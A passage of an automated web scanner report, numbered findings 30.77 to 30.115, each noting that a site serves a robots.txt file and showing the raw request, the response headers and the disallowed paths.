30.77. http://www.ashtondrake.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ashtondrake.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ashtondrake.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:04 GMT
Accept-Ranges: bytes
ETag: W/"151-1297777432000"
Last-Modified: Tue, 15 Feb 2011 13:43:52 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 151
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /quickinfo.html
Disallow: /itemshipinfo.html
Disallow: /store/
Disallow: /maregistersuccess.html
Disallow: /assets/
Allow: /



30.78. http://www.assistedliving.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assistedliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.assistedliving.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 58
Content-Type: text/plain
Content-Location: http://www.assistedliving.com/assistedliving.com/robots.txt
Last-Modified: Mon, 01 Jun 2009 20:58:49 GMT
Accept-Ranges: bytes
ETag: "ac714c3fbe2c91:44c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:35:47 GMT
Connection: close

...# Do not allow crawling

User-Agent: *
Disallow: /

30.79. http://www.autotrafficavalanche.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrafficavalanche.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotrafficavalanche.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:35 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Wed, 25 Aug 2010 12:07:36 GMT
ETag: "99201f-19-48ea4ba2af200"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

30.80. http://www.awltovhc.com/image-4989411-10774308

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.awltovhc.com
Path:   /image-4989411-10774308

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:19:11 GMT

# go away
User-agent: *
Disallow: /

30.81. http://www.bakingbites.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bakingbites.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bakingbites.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:34:36 GMT
Server: Apache
X-Pingback: http://bakingbites.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

30.82. http://www.bankforeclosuressale.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankforeclosuressale.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankforeclosuressale.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Oct 2010 14:52:34 GMT
ETag: "1c6-492e55390b080"
Accept-Ranges: bytes
Content-Length: 454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /js/
Disallow: /plesk-stat/
Disallow: /picture_library/
Disallow: /test/
Disallow: /linkspider/
Disallow: /list.php
Disallow: /lview.php
Disallow: /wp/wp-admin/
Disallow: /wp/a
...[SNIP]...

30.83. http://www.bankonyourself.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankonyourself.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankonyourself.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:40 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 299
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin
Disallow: /wp-login.php
Disallow: /xmlrpc.php
Disallow: /?s=
Disallow: /admin
Disallow: /page/*/
Disallow: /*/page/*/
Disallow: /Bank-On-Yourself-Special-Repo
...[SNIP]...

30.84. http://www.barnstormers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnstormers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnstormers.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 Feb 2008 02:42:13 GMT
ETag: "485-11f-6bc84b40"
Accept-Ranges: bytes
Content-Length: 287
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /user
Disallow: /banner_manager/click.php
Disallow: /click.php
Disallow: /export*
Disallow: /ad_manager/export*
Disallow: /*.csv$
Disallow:
...[SNIP]...

30.85. http://www.beauty-advices.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beauty-advices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beauty-advices.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:27 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
Last-Modified: Tue, 12 Apr 2011 12:19:22 GMT
ETag: "2789725-3d0-4a0b7b3c07951"
Accept-Ranges: bytes
Content-Length: 976
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
Disallow: /2006/
Disallow: /feed/
Disallow: /index.php
Disallow: /trackback/
Disallow: */trac
...[SNIP]...

30.86. http://www.beefybulldog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beefybulldog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beefybulldog.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 09 Sep 2010 01:56:27 GMT
ETag: "9d82a9-6a-48fc9f02508c0"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

30.87. http://www.bestbridalprices.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestbridalprices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestbridalprices.com

Response

HTTP/1.0 200 OK
Connection: close
Date: Sun, 01 May 2011 23:47:41 GMT
Server: Cherokee
Last-Modified: Tue, 29 Jun 2010 17:37:18 GMT
Content-Type: text/plain
Content-Length: 90

User-agent: *
Sitemap: http://www.bestbridalprices.com/sitemap.xml
Disallow: /cgi-bin/

30.88. http://www.blackanddeckerappliances.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackanddeckerappliances.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackanddeckerappliances.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 17:09:55 GMT
Accept-Ranges: bytes
ETag: "2bdbf9be779cb1:82a1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:18:06 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

30.89. http://www.bloodhero.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloodhero.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloodhero.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 27 Mar 2011 03:16:22 GMT
Accept-Ranges: bytes
ETag: "39859592deccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:24 GMT
Connection: close
Content-Length: 26
Set-Cookie: LB-Persist=1h+BZ2rjv8XTi39PpMUtQ/Kjihcnd7KJB649CsO49/DiyFJIZkAlSbewN/NMyQd+Ce1LntJiiBm2MiY=; path=/

User-agent: *
Disallow: /

30.90. http://www.bluesplayer.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluesplayer.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluesplayer.co.uk

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:10:50 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "30-4d90427f-0"
Last-Modified: Mon, 28 Mar 2011 08:10:39 GMT
Content-Type: text/plain
Content-Length: 48

User-agent: *
Disallow:
Disallow: /cgi-bin/

30.91. http://www.bnbtobacco.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnbtobacco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bnbtobacco.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 08 Jan 2011 21:48:49 GMT
Accept-Ranges: bytes
ETag: "3b41ed57dafcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:40 GMT
Connection: close
Content-Length: 305

User-agent: *
Disallow: /manage/
Disallow: confirmation.aspx
Disallow: default.aspx
Disallow: accounttype.aspx
Disallow: /_images/
Disallow: /_controls/
Disallow: /merchants/
Disallow: frmInte
...[SNIP]...

30.92. http://www.boatmotors.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boatmotors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boatmotors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:31 GMT
Server: Apache
Vary: *
Last-Modified: Tue, 06 Apr 2004 22:17:04 GMT
ETag: "39439e-85-40732c60"
Accept-Ranges: bytes
Content-Length: 133
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /engineparts/
Disallow: /sweepstakesreply.html
Disallow: /engine_testimonials.html
User-Agent: ia_archiver



30.93. http://www.bocajava.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bocajava.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bocajava.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"246-1292855965000"
Last-Modified: Mon, 20 Dec 2010 14:39:25 GMT
Content-Type: text/plain
Content-Length: 246
Date: Mon, 02 May 2011 00:03:41 GMT
Connection: close
Set-Cookie: security=1bjb; path=/

User-agent: *
Allow: /
Disallow: /myAccount.do
Disallow: /guestCheckout.do
Disallow: /confirmOrder.do
Disallow: /performLogonCheckout.do
Disallow: /register.do
Disallow: /checkout.do
Disallow: /Proces
...[SNIP]...

30.94. http://www.bonhams.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bonhams.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:32 GMT
Server: Apache
Last-Modified: Fri, 10 Feb 2006 15:25:01 GMT
ETag: "2867-d9-40c725522ed40"
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding
Content-Type: text/plain
Expires: Sun, 01 May 2011 23:31:32 GMT
Connection: close

User-agent: *
Disallow: Maintenance
Disallow: Missing
Disallow: /newswire/
Disallow: /thumbs/
Disallow: /usimages/
Disallow: /usareas/
Disallow: /usabout/
Disallow: /uslib/
Disallow: /usauction/
Disal
...[SNIP]...

30.95. http://www.boredpanda.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boredpanda.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boredpanda.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:46 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.boredpanda.com/blog/xmlrpc.php
Connection: close
Content-Type: text/html; charset="UTF-8"

User-agent: *
Disallow:

30.96. http://www.brookshirebrothers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookshirebrothers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brookshirebrothers.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:49 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 14:59:14 GMT
ETag: "466678-177-40fe7480"
Accept-Ranges: bytes
Content-Length: 375
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.97. http://www.bucadibeppo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bucadibeppo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bucadibeppo.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/plain
Date: Mon, 02 May 2011 00:06:14 GMT
Accept-Ranges: bytes
ETag: "e43654ca88b6cb1:0"
Connection: close
Set-Cookie: X-Mapping-pjfkgmck=9F6E3897466E5DEE025635F624ECA7DF; path=/
Last-Modified: Mon, 17 Jan 2011 20:54:53 GMT
X-Powered-By: ASP.NET
Content-Length: 652

# /robots.txt file for http://www.bucadibeppo.com/
# mail web@bucainc.com for feedback and comments

User-agent: *

Sitemap: http://www.bucadibeppo.com/sitemap.aspx
Disallow: /cacheadmin.aspx
Disallow
...[SNIP]...

30.98. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.business.att.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:54 GMT
Content-Length: 256
Content-Type: text
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
Last-Modified: Tue, 29 Mar 2011 16:21:13 GMT
ETag: "4f518-100-4d9206f9"
Accept-Ranges: bytes
X-Cache: MISS from 12.120.78.33
Via: 1.1 12.120.78.33:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

User-agent: *
Disallow: /library/
Disallow: /*online_campaign/cioforum/
Disallow: /*online_campaign/execevents/
Disallow: /*online_campaign/ciohcforum/
Disallow: /*online_campaign/tlf/
Disallow: /*ca
...[SNIP]...

30.99. http://www.calculatorcat.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calculatorcat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calculatorcat.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:29 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2005 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 61
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cs
Disallow: /codesrc
Disallow: /src

30.100. http://www.calvarywilliamsport.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calvarywilliamsport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calvarywilliamsport.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:22:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 31 May 2008 02:46:24 GMT
Accept-Ranges: bytes
Content-Length: 72
Content-Type: text/plain
Age: 0
Server: YTS/1.19.8

User-agent: *
Disallow: /pdf
Disallow: /logs
Disallow: /cm59.html


30.101. http://www.camp-california.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.camp-california.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.camp-california.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:28:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 12 Jul 2010 22:22:50 GMT
ETag: "2fc805c-130-48b3831656280"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.102. http://www.capterra.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capterra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.capterra.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:35:51 GMT
Content-Type: text/plain
Connection: close
ETag: "4adf1c66-f2-1100a10"
Last-Modified: Wed, 21 Oct 2009 14:36:22 GMT
Content-Length: 242

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

30.103. http://www.carfolio.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carfolio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carfolio.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:02:02 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Mon, 01 Nov 2010 17:27:51 GMT
ETag: "7aa002-2b9-4940120ae13c0"
Accept-Ranges: bytes
Content-Length: 697
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=691200
Expires: Tue, 10 May 2011 00:02:02 GMT
Vary: Accept-Encoding
Connection: close

#
User-agent: grub-client
Disallow: /specifications/

User-agent: *
Disallow: /diary/

User-agent: *
Disallow: /mail/

User-agent: *
Disallow: /classifieds/

User-agent: *
Disallow: /rt3/

User-agent:
...[SNIP]...

30.104. http://www.carsforagrand.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carsforagrand.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carsforagrand.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:07:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 16 Aug 2010 15:33:05 GMT
ETag: "f0c58-dd-48df28c762e40"
Accept-Ranges: bytes
Content-Length: 221
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *

Disallow: /listing/
Disallow: /detail/
Disallow: /edetail/
Disallow: /ebay.php
Disallow: /zipRSS.php
Disallow: /vin.php
Disallow: /links/
Disallow: /mail/

Sitemap: http://www.carsforag
...[SNIP]...

30.105. http://www.cato-at-liberty.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cato-at-liberty.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cato-at-liberty.org

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:36:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://www.cato-at-liberty.org/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.cato-at-liberty.org/sitemap.xml.gz

30.106. http://www.cbs8.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs8.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbs8.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9f2"
Cteonnt-Length: 818
Expires: Mon, 02 May 2011 00:40:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:40:25 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

30.107. http://www.celebridiot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebridiot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebridiot.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:53 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 01:09:53 GMT
Connection: close
Content-Type: text/plain

#######################################################
# iRobots.txt SEO

# All Bots
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /re
...[SNIP]...

30.108. http://www.celebtna.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebtna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebtna.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:27 GMT
Server: WebServerX
Last-Modified: Wed, 20 Apr 2011 07:28:48 GMT
ETag: "116878-172-4a15493552c00"
Accept-Ranges: bytes
Content-Length: 370
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.celebtna.com/Sitemap.xml
Disallow: /pictures/Paula_Nielsen-56706.jpg
Disallow: /pictures/Paula_Nielsen-43881.jpg
Disallow: /Brandi-Ann_Milbradt.htm
User-agent: *
Disa
...[SNIP]...

30.109. http://www.celebzilla.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebzilla.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebzilla.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:25 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Wed, 13 Apr 2011 17:29:45 GMT
ETag: "4f291da-c2-4a0d0279bb440"
Accept-Ranges: bytes
Content-Length: 194
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /join.php
Disallow: /admin/
Disallow: /sextapes.php
Disallow: /loader.php
Disallow: /getlaid.php
Disallow: /categories/
Disallow: /index.php?r=video&id
Allow: /

30.110. http://www.celiac.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celiac.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celiac.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:01 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Sat, 09 Apr 2011 20:39:46 GMT
ETag: "934001-873-4a08257cba880"
Accept-Ranges: bytes
Content-Length: 2163
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /celiac_test
Disallow: /articlerss
Disallow: /authors/forgotpass
Disallow: /blogrss
Disallow: /tmp
Disallow: /attachments
Disallow: /cache
Disallow: /newsrss
Disallow: /newsrss
...[SNIP]...

30.111. http://www.cellreception.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cellreception.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cellreception.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:05:20 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Wed, 24 Feb 2010 23:10:51 GMT
ETag: "680b8-cc-c70434c0"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: TurnitinBot
Disallow: /
User-agent: ia_archiver
Disallow: /
User-agent: Mediapartners-Google*
Disallow:
User-agent: YahooYSMcm*
Disallow:

User-agent: *
Disallow: /images/
Disallow: /input
...[SNIP]...

30.112. http://www.cfigroup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cfigroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cfigroup.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 08 Sep 2008 14:06:46 GMT
Accept-Ranges: bytes
ETag: "5613e520bc11c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:22 GMT
Connection: close
Content-Length: 48

User-agent: *
Disallow: /resources/whitepapers/

30.113. http://www.cheapism.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapism.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapism.com

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8b
Vary: Accept-Encoding
Last-Modified: Fri, 04 Sep 2009 15:19:47 GMT
Content-Type: text/plain
Content-Length: 24
Date: Mon, 02 May 2011 00:15:41 GMT
X-Varnish: 1487206803 1487206799
Age: 1
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow:

30.114. http://www.chicoer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chicoer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chicoer.com

Response

HTTP/1.0 200 OK
Content-Length: 114
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:35 GMT
Accept-Ranges: bytes
ETag: "80ddf411a16ca1:3020"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 00:50:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 00:50:38 GMT
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.chicoer.com/sitemap.xml

30.115. http://www.chrisbrownworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chrisbrownworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chrisbrownworld.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 20 Jan 2011 19:04:20 GMT
ETag: "30017b-9f6-49a4bcd093500"
Accept-Ranges: bytes
Content-Length: 2550
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:18:12 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/plain; charset=UTF-8

